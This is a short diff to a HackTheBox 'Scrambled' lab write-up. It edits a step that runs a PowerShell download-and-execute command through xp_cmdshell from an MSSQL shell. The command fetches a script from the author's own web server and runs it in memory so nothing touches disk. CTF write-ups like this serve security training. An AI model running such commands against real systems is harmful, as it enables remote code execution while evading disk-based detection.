MaxJackson13/HackTheBox/Scrambled/Scrambled.md

 ```
 replacing `whoami` with whatever command I want to execute as `miscsvc`

-From the MSSQLshell I'll use the command:
+From the MSSQL shell I'll use the command:
-`powershell Invoke-Expression(Invoke-WebRequest http://10.10.14.43/command.ps1 -UseBasicParsing)` which will retrieve the file from my webserver and `Invoke-Expression` will execute the command immediately in memory so nothing touches disk.
+`xp_cmdshell powershell Invoke-Expression(Invoke-WebRequest http://10.10.14.43/command.ps1 -UseBasicParsing)` which will retrieve the file from my webserver and `Invoke-Expression` will execute the command immediately in memory so nothing touches disk.

 On the webserver I get a hit